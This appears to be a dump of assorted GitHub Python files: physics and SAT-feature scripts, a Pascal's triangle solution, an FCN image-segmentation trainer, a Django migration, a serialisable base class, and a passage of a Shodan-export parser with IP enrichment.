seq_id | text | repo_name | sub_path | file_name | file_ext | file_size_in_byte | program_lang | lang | doc_type | stars | dataset | pt |
---|---|---|---|---|---|---|---|---|---|---|---|---|
27063319487
|
from NETWORKS import *
# Explicit imports for the names used below (assumed not re-exported by NETWORKS)
import numpy as np
import matplotlib.pyplot as plt
numAgentes = 100
interaction = 'Ising'
topologia = 'Circular'
iteracoes = numAgentes*10
gamma = np.linspace(0.0001,10,100)
valoresFinais = np.zeros((np.size(gamma),1))
for i in range(0,np.size(gamma)):
current = np.zeros((iteracoes, 1))
Grid = Network(numAgentes, interaction, topologia, iteracoes)
for j in range (0,iteracoes):
Grid.IsingInteraction(gamma[i],0,j)
current[j] = Grid.Expectative
valoresFinais[i] = np.mean(current[int(np.size(current)/2-1) :])
fig1 = plt.figure(1)
plt.plot(gamma, valoresFinais)
plt.ylabel('Magnetization')
plt.xlabel('Gamma')
plt.title('')
plt.show()
|
mconde94/Codigos-Tese
|
Behavioral Macroeconomic models/AntBasedModel.py
|
AntBasedModel.py
|
py
| 640 |
python
|
en
|
code
| 1 |
github-code
|
6
|
39824039269
|
import random
import numpy as np
from scipy.stats import entropy
class CNF:
def __init__(self, path=None, clauses=None):
if path:
with open(path, 'r') as cnf:
formula = cnf.read()
formula = formula.split('\n')
start_index = 0
while formula[start_index][0] != 'p':
start_index += 1
self.n = int(formula[start_index].split()[2])
self.variables = [i+1 for i in range(self.n)]
self.m = int(formula[start_index].split()[3])
self.clauses = [list(map(int, formula[start_index + 1 + i].split()[:-1])) for i in range(self.m)]
else:
variables = set()
for clause in clauses:
for var in clause:
variables.add(abs(var))
self.n = len(variables)
self.variables = list(variables)
self.m = len(clauses)
self.clauses = clauses
def get_size(self):
return [self.m, self.n, float(self.m) / self.n]
def get_vc(self):
nodes = {i: set() for i in self.variables}
for j in range(self.m):
for var in self.clauses[j]:
nodes[abs(var)].add(j)
nodes = [len(nodes.get(i)) for i in nodes]
nodes_np = np.array(nodes)
nodes_proba = np.unique(nodes_np, return_counts=True)[1]/float(len(nodes_np))
nodes_entropy = entropy(list(nodes_proba))
clause = []
for j in range(self.m):
cl = set()
for i in range(len(self.clauses[j])):
cl.add(abs(self.clauses[j][i]))
clause.append(len(cl))
clause_np = np.array(clause)
clause_proba = np.unique(clause_np, return_counts=True)[1]/float(len(clause_np))
clause_entropy = entropy(list(clause_proba))
return [nodes_np.mean(), nodes_np.std()/nodes_np.mean(), nodes_np.min(), nodes_np.max(), nodes_entropy,
clause_np.mean(), clause_np.std()/clause_np.mean(), clause_np.min(), clause_np.max(), clause_entropy]
def get_v(self):
variables = {i: set() for i in self.variables}
for j in range(self.m):
for var in self.clauses[j]:
for var_o in self.clauses[j]:
if abs(var_o) != abs(var):
variables[abs(var)].add(abs(var_o))
var_deg = [len(variables.get(i)) for i in variables]
var_deg_np = np.array(var_deg)
return [var_deg_np.mean(), var_deg_np.std()/var_deg_np.mean(), var_deg_np.min(), var_deg_np.max()]
def get_balance(self):
ratio_clause = []
for clause in self.clauses:
pos, neg = 0, 0
for var in clause:
if var > 0:
pos += 1
else:
neg += 1
ratio_clause.append(float(pos) / (pos + neg))
ratio_clause_np = np.array(ratio_clause)
ratio_clause_proba = np.unique(ratio_clause_np, return_counts=True)[1] / float(len(ratio_clause_np))
ratio_clause_entropy = entropy(list(ratio_clause_proba))
ration_var = {i: [0, 0] for i in self.variables}
for j in range(self.m):
for var in self.clauses[j]:
if var > 0:
ration_var.get(abs(var))[0] += 1
else:
ration_var.get(abs(var))[1] += 1
ration_var = [float(ration_var.get(i)[0]) / (ration_var.get(i)[0] + ration_var.get(i)[1]) for i in ration_var]
ration_var_np = np.array(ration_var)
ration_var_proba = np.unique(ration_var_np, return_counts=True)[1] / float(len(ration_var_np))
ration_var_entropy = entropy(list(ration_var_proba))
binary, ternary = 0, 0
for clause in self.clauses:
if len(clause) == 2:
binary += 1
elif len(clause) == 3:
ternary += 1
return [ratio_clause_np.mean(), ratio_clause_np.std()/ratio_clause_np.mean(), ratio_clause_entropy,
ration_var_np.mean(), ration_var_np.std()/ration_var_np.mean(), ration_var_np.min(),
ration_var_np.max(), ration_var_entropy, float(binary)/self.m, float(ternary)/self.m]
def get_horn(self):
num_of_horns = 0
horn_var = {i: 0 for i in self.variables}
for clause in self.clauses:
horn = True
cnt = 0
for var in clause:
if var > 0:
cnt += 1
if cnt > 1:
horn = False
break
if horn:
num_of_horns += 1
for vr in clause:
horn_var[abs(vr)] += 1
horn_var = [horn_var.get(i) for i in horn_var]
horn_var_np = np.array(horn_var)
horn_var_proba = np.unique(horn_var_np, return_counts=True)[1] / float(len(horn_var_np))
horn_var_entropy = entropy(list(horn_var_proba))
return [float(num_of_horns) / self.m, horn_var_np.mean(), horn_var_np.std()/horn_var_np.mean(),
horn_var_np.min(), horn_var_np.max(), horn_var_entropy]
def get_features(self):
size = self.get_size()
vc = self.get_vc()
v = self.get_v()
balance = self.get_balance()
horn = self.get_horn()
return size + vc + v + balance + horn
def set_var(self, var=None):
if not var:
var = random.choice(self.variables + [-i for i in self.variables])
new_clauses = [[i for i in clause if i != -var] for clause in self.clauses if var not in clause]
return CNF(clauses=new_clauses)
|
mosin26/master_thesis
|
cnf.py
|
cnf.py
|
py
| 5,685 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43079348194
|
from typing import List
class Solution:
def factorial(self, n: int) -> int:
fact = 1
for i in range(1, n+1):
fact *= i
return fact
def combination(self, n: int, r: int) -> int:
return self.factorial(n) // (self.factorial(n-r) * self.factorial(r))
def generate(self, numRows: int) -> List[List[int]]:
pascal_triangles = list()
for i in range(numRows):
inner_list = []
for j in range(i+1):
inner_list.append(self.combination(i,j))
pascal_triangles.append(inner_list)
return pascal_triangles
print(Solution().generate(5))
|
devKhush/DSALeetCodeProblems_Python
|
Pascal's Triangle/GeneratePascalTriangle.py
|
GeneratePascalTriangle.py
|
py
| 659 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6193371438
|
#! /usr/bin/env python
"""
A very simple program to print the triplet primes less than n.
Leon Hostetler, Jan. 26, 2017
USAGE: python primes_triplets.py
"""
from __future__ import division, print_function
n = 1000
# Checks to see if a number is prime
def is_prime(n):
    for i in range(2, n):
        if n % i == 0:
            return False  # Return false if divisible by any smaller number
    return True  # Return true if not divisible by any smaller number
# Print all the triplet primes less than n
counter = 0
for i in range(2, n):
if is_prime(i) and is_prime(i+2) and is_prime(i+6):
print(i, ", ", i+2, ", ", i+6, sep="")
counter += 1
if is_prime(i) and is_prime(i+4) and is_prime(i+6):
print(i, ", ", i+4, ", ", i+6, sep="")
counter += 1
print()
print("There are ", counter, " prime triplets less than ", n, ".")
|
leonhostetler/sample-programs
|
python/prime_numbers/primes_triplets.py
|
primes_triplets.py
|
py
| 944 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37198526566
|
# _*_ coding: utf-8 _*_
# @author: anniequ
# @file: datapre.py
# @time: 2020/11/12 11:07
# @Software: PyCharm
import os
from PIL import Image
import matplotlib.pyplot as plt
import numpy as np
import torch
import torchvision.transforms as tfs
from torch.utils.data import DataLoader
from torch import nn
import torch.nn.functional as f
import torchvision
from torch.autograd import Variable
import torchvision.models as models
from datetime import datetime
voc_root = os.path.join("data", "VOC2012")
np.seterr(divide='ignore',invalid='ignore')
# Read the image and label file paths
def read_img(root=voc_root, train=True):
txt_frame = root + '/ImageSets/Segmentation/' + ('train.txt' if train else 'val.txt')
with open(txt_frame, 'r') as f:
images = f.read().split()
data = [os.path.join(root, 'JPEGImages', i + '.jpg') for i in images]
label = [os.path.join(root, 'SegmentationClass', i + '.png') for i in images]
return data, label
# Images differ in size, so crop data and label together
def crop(data, label, height, width):
'data and label both are Image object'
box = (0, 0, width, height)
data = data.crop(box)
label = label.crop(box)
return data, label
# Class labels in the VOC dataset
classes = ['background', 'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',
'dog', 'horse', 'motorbike', 'person', 'potted plant',
'sheep', 'sofa', 'train', 'tv/monitor']
# Colors corresponding to each label
colormap = [[0, 0, 0], [128, 0, 0], [0, 128, 0], [128, 128, 0], [0, 0, 128],
[128, 0, 128], [0, 128, 128], [128, 128, 128], [64, 0, 0], [192, 0, 0],
[64, 128, 0], [192, 128, 0], [64, 0, 128], [192, 0, 128],
[64, 128, 128], [192, 128, 128], [0, 64, 0], [128, 64, 0],
[0, 192, 0], [128, 192, 0], [0, 64, 128]]
cm2lbl = np.zeros(256 ** 3)
# When enumerating, i is the class index and cm is an (R, G, B) triple
for i, cm in enumerate(colormap):
cm2lbl[(cm[0] * 256 + cm[1]) * 256 + cm[2]] = i
# Map each RGB label value to the index of its class
def image2label(im):
data = np.array(im, dtype="int32")
idx = (data[:, :, 0] * 256 + data[:, :, 1]) * 256 + data[:, :, 2]
return np.array(cm2lbl[idx], dtype="int64")
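# Added note (not in the original script): for a single pixel colored [128, 0, 0]
# (the 'aeroplane' color above), image2label(np.array([[[128, 0, 0]]])) returns
# array([[1]]), i.e. class index 1.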
def image_transforms(data, label, height, width):
data, label = crop(data, label, height, width)
    # Convert the data to a tensor and normalize it
im_tfs = tfs.Compose([
tfs.ToTensor(),
tfs.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
data = im_tfs(data)
label = image2label(label)
label = torch.from_numpy(label)
return data, label
class VOCSegDataset(torch.utils.data.Dataset):
    # Constructor
def __init__(self, train, height, width, transforms=image_transforms):
self.height = height
self.width = width
        self.fnum = 0  # number of images filtered out
self.transforms = transforms
data_list, label_list = read_img(train=train)
self.data_list = self._filter(data_list)
self.label_list = self._filter(label_list)
        if train:
            print("Training set: loaded " + str(len(self.data_list)) + " images and labels, filtered out " + str(self.fnum) + " images")
        else:
            print("Test set: loaded " + str(len(self.data_list)) + " images and labels, filtered out " + str(self.fnum) + " images")
    # Filter out images whose height or width is smaller than the requested crop size
def _filter(self, images):
img = []
for im in images:
if (Image.open(im).size[1] >= self.height and
Image.open(im).size[0] >= self.width):
img.append(im)
else:
self.fnum = self.fnum + 1
return img
    # Override __getitem__ so the dataset can be indexed
def __getitem__(self, idx):
img = self.data_list[idx]
label = self.label_list[idx]
img = Image.open(img)
label = Image.open(label).convert('RGB')
img, label = self.transforms(img, label, self.height, self.width)
return img, label
def __len__(self):
return len(self.data_list)
height = 224
width = 224
voc_train = VOCSegDataset(True, height, width)
voc_test = VOCSegDataset(False, height, width)
train_data = DataLoader(voc_train, batch_size=8, shuffle=True)
valid_data = DataLoader(voc_test, batch_size=8)
# Below we build an FCN based on resnet34
# Function that initializes transposed-convolution kernels with bilinear weights
def bilinear_kernel(in_channels, out_channels, kernel_size):
factor = (kernel_size + 1) // 2
if kernel_size % 2 == 1:
center = factor - 1
else:
center = factor - 0.5
og = np.ogrid[:kernel_size, :kernel_size]
filt = (1 - abs(og[0] - center) / factor) * \
(1 - abs(og[1] - center) / factor)
weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size),
dtype='float32')
weight[range(in_channels), range(out_channels), :, :] = filt
return torch.from_numpy(np.array(weight))
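# Note on bilinear_kernel above (added; not in the original script): for kernel_size=4
# it assigns each channel the outer product of the 1D profile [0.25, 0.75, 0.75, 0.25],
# i.e. standard bilinear-upsampling weights; kernel_size=16 gives the analogous 16-tap ramp.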
# Load the pretrained resnet34 network
model_root = "./model/resnet34-333f7ec4.pth"
pretrained_net = models.resnet34(pretrained=False)
pre = torch.load(model_root)
pretrained_net.load_state_dict(pre)
# Total number of classes
num_classes = len(classes)
print(num_classes)
class fcn(nn.Module):
def __init__(self, num_classes):
super(fcn, self).__init__()
        # Stage 1: 128 channels, 28x28 output feature map
self.stage1 = nn.Sequential(*list(pretrained_net.children())[:-4])
        # Stage 2: 256 channels, 14x14 output feature map
self.stage2 = list(pretrained_net.children())[-4]
        # Stage 3: 512 channels, 7x7 output feature map
self.stage3 = list(pretrained_net.children())[-3]
        # Three 1x1 convolutions that fuse the channel information
self.scores1 = nn.Conv2d(512, num_classes, 1)
self.scores2 = nn.Conv2d(256, num_classes, 1)
self.scores3 = nn.Conv2d(128, num_classes, 1)
        # Enlarge the feature map by a factor of 8
        self.upsample_8x = nn.ConvTranspose2d(num_classes, num_classes, kernel_size=16, stride=8, padding=4, bias=False)
        self.upsample_8x.weight.data = bilinear_kernel(num_classes, num_classes, 16)  # use a bilinear kernel
        # This is the 4x upsampling path; the same pattern is used below
        self.upsample_4x = nn.ConvTranspose2d(num_classes, num_classes, kernel_size=4, stride=2, padding=1, bias=False)
        self.upsample_4x.weight.data = bilinear_kernel(num_classes, num_classes, 4)  # use a bilinear kernel
        self.upsample_2x = nn.ConvTranspose2d(num_classes, num_classes, kernel_size=4, stride=2, padding=1, bias=False)
        self.upsample_2x.weight.data = bilinear_kernel(num_classes, num_classes, 4)  # use a bilinear kernel
def forward(self, x):
x = self.stage1(x)
s1 = x # 224/8 = 28
x = self.stage2(x)
s2 = x # 224/16 = 14
x = self.stage3(x)
s3 = x # 224/32 = 7
        s3 = self.scores1(s3)  # fuse the channel information
        s3 = self.upsample_2x(s3)  # upsample
        s2 = self.scores2(s2)
        s2 = s2 + s3  # 14*14
        s1 = self.scores3(s1)
        s2 = self.upsample_4x(s2)  # upsample to 28*28
        s = s1 + s2  # 28*28
        s = self.upsample_8x(s)  # enlarge 8x to 224*224
        return s  # return the score map
# Compute the confusion matrix
def _fast_hist(label_true, label_pred, n_class):
    # mask is True at every position of label_true that holds a valid class index
    # label_true[mask] returns the elements whose mask entry is True
    mask = (label_true >= 0) & (label_true < n_class)
    # np.bincount() counts how many times each index value occurs
    """
    hist is a confusion matrix: a 2D array indexed as hist[label_true][label_pred].
    The entry at row r, column c counts pixels whose true class is r and whose
    predicted class is c, so the diagonal holds the correctly predicted pixel counts.
    n_class * label_true[mask].astype(int) + label_pred[mask] flattens the 2D index
    into a 1D address (each element has size 1) and yields a numpy array;
    np.bincount then counts how often each value occurs.
    """
hist = np.bincount(
n_class * label_true[mask].astype(int) +
label_pred[mask], minlength=n_class ** 2).reshape(n_class, n_class)
return hist
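# Hedged illustration (added; not in the original script) of the bincount trick above:
# with n_class = 2, label_true = np.array([0, 1, 1]) and label_pred = np.array([0, 0, 1]),
# the flattened indices are [0, 2, 3], so _fast_hist returns [[1, 0], [1, 1]]:
# one class-0 pixel predicted correctly, one class-1 pixel predicted as class 0,
# and one class-1 pixel predicted correctly.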
"""
label_trues 正确的标签值
label_preds 模型输出的标签值
n_class 数据集中的分类数
"""
def label_accuracy_score(label_trues, label_preds, n_class):
"""Returns accuracy score evaluation result.
- overall accuracy
- mean accuracy
- mean IU
- fwavacc
"""
hist = np.zeros((n_class, n_class))
    # A batch may contain several samples;
    # iterate over them and accumulate the histogram
    for lt, lp in zip(label_trues, label_preds):
        # numpy.ndarray.flatten flattens the numpy array to 1D
        hist += _fast_hist(lt.flatten(), lp.flatten(), n_class)
    # np.diag(a) returns the diagonal elements of a 2D matrix a
    # np.sum() sums all elements; with axis=1 it sums along each row
    """
    acc is the overall accuracy = correctly predicted pixels / total pixels
    acc_cls is the per-class accuracy (e.g. row 0 gives the accuracy for class 0), then averaged
    iu is the per-class intersection over union
    mean_iu is the mean of iu over all classes
    freq is the frequency with which each class occurs
    fwavacc is the frequency-weighted iu
    """
    acc = np.diag(hist).sum() / hist.sum()
    acc_cls = np.diag(hist) / hist.sum(axis=1)
    # nanmean averages while ignoring NaN entries
    acc_cls = np.nanmean(acc_cls)
iu = np.diag(hist) / (hist.sum(axis=1) + hist.sum(axis=0) - np.diag(hist))
mean_iu = np.nanmean(iu)
freq = hist.sum(axis=1) / hist.sum()
fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()
return acc, acc_cls, mean_iu, fwavacc
net = fcn(num_classes)
if torch.cuda.is_available():
net = net.cuda()
criterion = nn.NLLLoss()
basic_optim = torch.optim.SGD(net.parameters(), lr=1e-2, weight_decay=1e-4)
optimizer = basic_optim
# Train the network
EPOCHES = 20
# Metrics collected during training
train_loss = []
train_acc = []
train_acc_cls = []
train_mean_iu = []
train_fwavacc = []
# Metrics collected during validation
eval_loss = []
eval_acc = []
eval_acc_cls = []
eval_mean_iu = []
eval_fwavacc = []
for e in range(EPOCHES):
_train_loss = 0
_train_acc = 0
_train_acc_cls = 0
_train_mean_iu = 0
_train_fwavacc = 0
prev_time = datetime.now()
net = net.train()
for img_data, img_label in train_data:
        if torch.cuda.is_available():
im = Variable(img_data).cuda()
label = Variable(img_label).cuda()
else:
im = Variable(img_data)
label = Variable(img_label)
        # forward pass
out = net(im)
out = f.log_softmax(out, dim=1)
loss = criterion(out, label)
        # backward pass
optimizer.zero_grad()
loss.backward()
optimizer.step()
_train_loss += loss.item()
        # label_pred comes from a 21*224*224 output: every pixel has a probability for each of the 21 classes
        # take the index with the highest probability as the predicted label, then compute the evaluation metrics
label_pred = out.max(dim=1)[1].data.cpu().numpy()
label_true = label.data.cpu().numpy()
for lbt, lbp in zip(label_true, label_pred):
acc, acc_cls, mean_iu, fwavacc = label_accuracy_score(lbt, lbp, num_classes)
_train_acc += acc
_train_acc_cls += acc_cls
_train_mean_iu += mean_iu
_train_fwavacc += fwavacc
    # Record this epoch's training metrics
train_loss.append(_train_loss / len(train_data))
train_acc.append(_train_acc / len(voc_train))
train_acc_cls.append(_train_acc_cls)
train_mean_iu.append(_train_mean_iu / len(voc_train))
train_fwavacc.append(_train_fwavacc)
net = net.eval()
_eval_loss = 0
_eval_acc = 0
_eval_acc_cls = 0
_eval_mean_iu = 0
_eval_fwavacc = 0
for img_data, img_label in valid_data:
if torch.cuda.is_available():
im = Variable(img_data).cuda()
label = Variable(img_label).cuda()
else:
im = Variable(img_data)
label = Variable(img_label)
# forward
out = net(im)
out = f.log_softmax(out, dim=1)
loss = criterion(out, label)
_eval_loss += loss.item()
label_pred = out.max(dim=1)[1].data.cpu().numpy()
label_true = label.data.cpu().numpy()
for lbt, lbp in zip(label_true, label_pred):
acc, acc_cls, mean_iu, fwavacc = label_accuracy_score(lbt, lbp, num_classes)
_eval_acc += acc
_eval_acc_cls += acc_cls
_eval_mean_iu += mean_iu
_eval_fwavacc += fwavacc
    # Record this epoch's validation metrics
eval_loss.append(_eval_loss / len(valid_data))
eval_acc.append(_eval_acc / len(voc_test))
eval_acc_cls.append(_eval_acc_cls)
eval_mean_iu.append(_eval_mean_iu / len(voc_test))
eval_fwavacc.append(_eval_fwavacc)
    # Print this epoch's results
cur_time = datetime.now()
h, remainder = divmod((cur_time - prev_time).seconds, 3600)
m, s = divmod(remainder, 60)
epoch_str = ('Epoch: {}, Train Loss: {:.5f}, Train Acc: {:.5f}, Train Mean IU: {:.5f}, \
Valid Loss: {:.5f}, Valid Acc: {:.5f}, Valid Mean IU: {:.5f} '.format(
e, _train_loss / len(train_data), _train_acc / len(voc_train), _train_mean_iu / len(voc_train),
_eval_loss / len(valid_data), _eval_acc / len(voc_test), _eval_mean_iu / len(voc_test)))
time_str = 'Time: {:.0f}:{:.0f}:{:.0f}'.format(h, m, s)
print(epoch_str + time_str)
# Plotting
epoch = np.array(range(EPOCHES))
plt.plot(epoch, train_loss, label="train_loss")
plt.plot(epoch, train_loss, label="valid_loss")
plt.title("loss during training")
plt.legend()
plt.grid()
plt.show()
plt.plot(epoch, train_acc, label="train_acc")
plt.plot(epoch, eval_acc, label="valid_acc")
plt.title("accuracy during training")
plt.legend()
plt.grid()
plt.show()
plt.plot(epoch, train_mean_iu, label="train_mean_iu")
plt.plot(epoch, eval_mean_iu, label="valid_mean_iu")
plt.title("mean iu during training")
plt.legend()
plt.grid()
plt.show()
# Evaluate the model's performance
# Save the model
PATH = "./model/fcn-resnet34.pth"
torch.save(net.state_dict(), PATH)
# Load the model
# model.load_state_dict(torch.load(PATH))
cm = np.array(colormap).astype('uint8')
def predict(img, label):  # predict the segmentation for one image
img = Variable(img.unsqueeze(0)).cuda()
out = net(img)
pred = out.max(1)[1].squeeze().cpu().data.numpy()
    # Convert the predicted class indices into the corresponding RGB colors
pred = cm[pred]
    # Convert the numpy array into a PIL Image
pred = Image.fromarray(pred)
label = cm[label.numpy()]
return pred, label
size = 224
num_image = 10
_, figs = plt.subplots(num_image, 3, figsize=(12, 22))
for i in range(num_image):
img_data, img_label = voc_test[i]
pred, label = predict(img_data, img_label)
img_data = Image.open(voc_test.data_list[i])
img_label = Image.open(voc_test.label_list[i]).convert("RGB")
img_data, img_label = crop(img_data, img_label, size, size)
    figs[i, 0].imshow(img_data)  # original image
    figs[i, 0].axes.get_xaxis().set_visible(False)  # hide the x axis
    figs[i, 0].axes.get_yaxis().set_visible(False)  # hide the y axis
    figs[i, 1].imshow(img_label)  # ground-truth label
    figs[i, 1].axes.get_xaxis().set_visible(False)  # hide the x axis
    figs[i, 1].axes.get_yaxis().set_visible(False)  # hide the y axis
    figs[i, 2].imshow(pred)  # model prediction
    figs[i, 2].axes.get_xaxis().set_visible(False)  # hide the x axis
    figs[i, 2].axes.get_yaxis().set_visible(False)  # hide the y axis
# Add the titles below the last row of images
figs[num_image - 1, 0].set_title("Image", y=-0.2)
figs[num_image - 1, 1].set_title("Label", y=-0.2)
figs[num_image - 1, 2].set_title("fcns", y=-0.2)
|
Anniequ/FCNcopy
|
all.py
|
all.py
|
py
| 16,271 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32108115946
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("orgs", "0014_auto_20150722_1419")]
operations = [
migrations.CreateModel(
name="ContactField",
fields=[
("id", models.AutoField(verbose_name="ID", serialize=False, auto_created=True, primary_key=True)),
("label", models.CharField(max_length=36, verbose_name="Label")),
("key", models.CharField(max_length=36, verbose_name="Key")),
("value_type", models.CharField(max_length=1, verbose_name="Field Type")),
(
"org",
models.ForeignKey(
related_name="contactfields", on_delete=models.PROTECT, verbose_name="Org", to="orgs.Org"
),
),
],
)
]
|
rapidpro/ureport
|
ureport/contacts/migrations/0001_initial.py
|
0001_initial.py
|
py
| 990 |
python
|
en
|
code
| 23 |
github-code
|
6
|
29057620857
|
#!/usr/bin/python3
"""
base module contains the Base class
"""
import json
class Base:
"""
Base class: manage id attribute in all the subclass
Attributes:
__nb_objects - class attribute initialized with 0
__init__ - class constructor
"""
__nb_objects = 0
def __init__(self, id=None):
"""assign the public instance attribute id"""
        if id is not None:
self.id = id
else:
type(self).__nb_objects += 1
self.id = type(self).__nb_objects
@staticmethod
def to_json_string(list_dictionaries):
"""returns the JSON string repr"""
if list_dictionaries:
return json.dumps(list_dictionaries)
return "[]"
@classmethod
def save_to_file(cls, list_objs):
"""writes the JSON string repr of list_objs to a file"""
list_dict = []
if list_objs:
for i in list_objs:
list_dict.append(i.to_dictionary())
objs_json = cls.to_json_string(list_dict)
filename = cls.__name__ + ".json"
with open(filename, 'w', encoding="utf-8") as f:
f.write(objs_json)
@staticmethod
def from_json_string(json_string):
"""deserialises the json obj and returns the python object"""
import json
if not json_string:
return []
return json.loads(json_string)
@classmethod
def create(cls, **dictionary):
"""returns an instance with all attr already set"""
if not dictionary:
return cls
if cls.__name__ == "Rectangle":
rectangle = cls(1, 1)
rectangle.update(**dictionary)
return rectangle
square = cls(1)
square.update(**dictionary)
return square
@classmethod
def load_from_file(cls):
"""returns a list of instances"""
import os
filename = cls.__name__ + ".json"
if not os.path.exists(filename):
return []
with open(filename, "r", encoding='utf-8') as f:
json_str = f.read()
list_dict = cls.from_json_string(json_str)
list_obj = []
for item in list_dict:
instance = cls.create(**item)
list_obj.append(instance)
return list_obj
@classmethod
def save_to_file_csv(cls, list_objs):
"""parse list_objs to csv"""
import csv
"""if not list_objs:
return None"""
if cls.__name__ == "Rectangle":
fields = ["id", "width", "height", "x", "y"]
elif cls.__name__ == "Square":
fields = ["id", "size", "x", "y"]
filename = cls.__name__ + ".csv"
with open(filename, 'w', newline='', encoding='utf-8') as f:
csvwriter = csv.writer(f)
csvwriter.writerow(fields)
list_dict = []
for item in list_objs:
cls_dict = item.to_dictionary()
instance_value = []
for key in fields:
instance_value.append(cls_dict[key])
list_dict.append(instance_value)
csvwriter.writerows(list_dict)
@classmethod
def load_from_file_csv(cls):
"""load a csv to list_obj"""
import csv
filename = cls.__name__ + ".csv"
list_objs = []
with open(filename, 'r', newline='', encoding='utf-8') as f:
csvreader = csv.reader(f)
fields = next(csvreader)
key_value = {}
for row in csvreader:
i = 0
for attr in fields:
key_value[attr] = int(row[i])
i += 1
python_obj = cls.create(**key_value)
list_objs.append(python_obj)
return list_objs
|
ZIHCO/alx-higher_level_programming
|
0x0C-python-almost_a_circle/models/base.py
|
base.py
|
py
| 3,809 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43332148964
|
import logging
import json
import gzip
import ipaddress
import datetime
from c99api import EndpointClient
from typing import List, Dict, Optional
from os.path import exists
from pydantic import BaseModel
logger = logging.getLogger()
def enrich_object_c99(object, c99_key:str=""):
c99 = EndpointClient
c99.key = c99_key
ip = object["IPAddress"]
resp = c99.gethostname(ip)
if resp["success"] and ip != resp["hostname"] and resp["hostname"] not in object["hostname_list"]:
logging.info(f"gethostname: {resp['hostname']}")
object["hostname_list"].append(resp["hostname"])
resp = c99.ip2domains(ip)
if resp["success"] and resp["count"] >= 1:
logging.info(f"ip2domains: {resp['data']}")
object["domain_list"].extend([hname for hname in resp["data"] if hname not in object["domain_list"]])
def merge_config(current_config: Dict[int, str] = {}, custom_config: Dict[int, str] = {}):
for key, value in custom_config.items():
if key in current_config.keys():
if isinstance(value, (list,)):
                current_config[key] = list(set(current_config[key] + value))
elif isinstance(value, (dict,)):
current_config[key] = merge_config(current_config[key], custom_config[key])
else:
current_config[key] = value
else:
current_config.update({key: value})
return current_config
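# Hedged usage sketch (added; not part of the original module): merging
# {"a": 1, "log": {"level": "INFO"}} with {"log": {"file": "x.log"}} yields
# {"a": 1, "log": {"level": "INFO", "file": "x.log"}}: scalars are overridden,
# nested dicts are merged recursively, and lists are combined and de-duplicated.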
def load_config(default_config: str = "config.default.json", override_config: str = ""):
config_builder = {}
if exists(default_config):
with open(default_config, "r", encoding="utf-8") as config_file:
config_builder = json.load(config_file)
else:
raise ValueError("config file not found")
if exists(override_config):
with open(override_config, "r", encoding="utf-8") as config_file:
try:
configData = json.load(config_file)
config_builder = merge_config(current_config=config_builder, custom_config=configData)
except Exception as e:
logger.error(f"Error adding override config\n{e}")
return config_builder
def decode_shodan(obj:dict={}):
try:
parsed_object = {
"domain_list": obj["domains"] if "domains" in obj else [],
"hostname_list": [obj["_shodan"]["options"]["hostname"]] if "hostname" in obj["_shodan"]["options"] else [],
"cloud_provider": None,
"operating_system": obj["os"],
"product": obj["product"] if "product" in obj else "",
"IPAddress": ipaddress.ip_address(obj["ip_str"]),
"timestamp": datetime.datetime.fromisoformat(obj["timestamp"]),
"protocol": obj["transport"] if "transport" in obj else "",
"internet_service_provider": obj["isp"],
"version": obj["version"] if "version" in obj else "",
"organisation": obj["org"],
"country": obj["location"]["country_name"] if "country_name" in obj["location"] else "",
"city": obj["location"]["city"] if "city" in obj["location"] else "",
"port": obj["port"]
}
parsed_object["hostname_list"].extend([hname.strip() for hname in obj["hostnames"]])
except Exception as e:
logging.error(e)
return {}
try:
if "ssl" in obj and "cert" in obj["ssl"]:
cert = obj["ssl"]
#parsed_object["ssl_fingerprint"] = cert["cert"]["fingerprint"]["sha256"]
#parsed_object["ssl_serial"] = cert["cert"]["serial"]
parsed_object["ssl_SAN"] = [cert["cert"]["subject"]["CN"]] if "CN" in cert["cert"]["subject"]["CN"] else []
for alt in cert["cert"]["extensions"]:
if alt["name"]=="subjectAltName" and alt["data"]:
i = 0
while i < len(alt["data"]):
if alt["data"][i] == "\\":
i += 4
continue
next_slash = alt["data"][i:].find("\\")
if next_slash >= 0:
parsed_object["ssl_SAN"].append(alt["data"][i:i+next_slash])
i += next_slash
else:
parsed_object["ssl_SAN"].append(alt["data"][i:])
i = len(alt["data"])
if parsed_object["ssl_SAN"][-1] == "0.":
parsed_object["ssl_SAN"].pop()
parsed_object["ssl_SAN"] = list(set(parsed_object["ssl_SAN"]))
parsed_object["ssl_issuer"] = cert["cert"]["issuer"]["O"] if "O" in cert["cert"]["issuer"] else cert["cert"]["issuer"]["CN"]
#parsed_object["ssl_ja3"] = cert["ja3s"]
#parsed_object["ssl_jarm"] = cert["jarm"]
parsed_object["ssl_expiration"] = datetime.datetime.strptime(cert["cert"]["expires"], "%Y%m%d%H%M%SZ")
else:
#parsed_object["ssl_fingerprint"] = ""
#parsed_object["ssl_serial"] = -1
parsed_object["ssl_SAN"] = []
parsed_object["ssl_issuer"] = ""
#parsed_object["ssl_ja3"] = ""
#parsed_object["ssl_jarm"] = ""
parsed_object["ssl_expiration"] = datetime.datetime.fromordinal(1)
except Exception as e:
#parsed_object["ssl_fingerprint"] = ""
#parsed_object["ssl_serial"] = -1
parsed_object["ssl_SAN"] = []
parsed_object["ssl_issuer"] = ""
#parsed_object["ssl_ja3"] = ""
#parsed_object["ssl_jarm"] = ""
parsed_object["ssl_expiration"] = datetime.datetime.fromordinal(1)
logging.error(e)
return parsed_object
def load_shodan_files(filename:str="", config:Dict={}):
if not exists(filename):
logging.error(f"File not found: {filename}")
raise FileNotFoundError
logging.info(f"Loading file: {filename}")
if filename.endswith(".json.gz"):
with gzip.open(filename, "rb") as archive:
lines = archive.readlines()
else:
with open(filename, "rb") as raw_file:
lines = raw_file.readlines()
data = []
error_count = 0
for line in lines:
try:
json_obj = json.loads(line)
try:
obj = decode_shodan(obj=json_obj)
data.append(obj)
except Exception as e:
logger.warning(f"JSON data could not be parsed")
logger.warning(e)
except:
error_count += 1
continue
if error_count > 0:
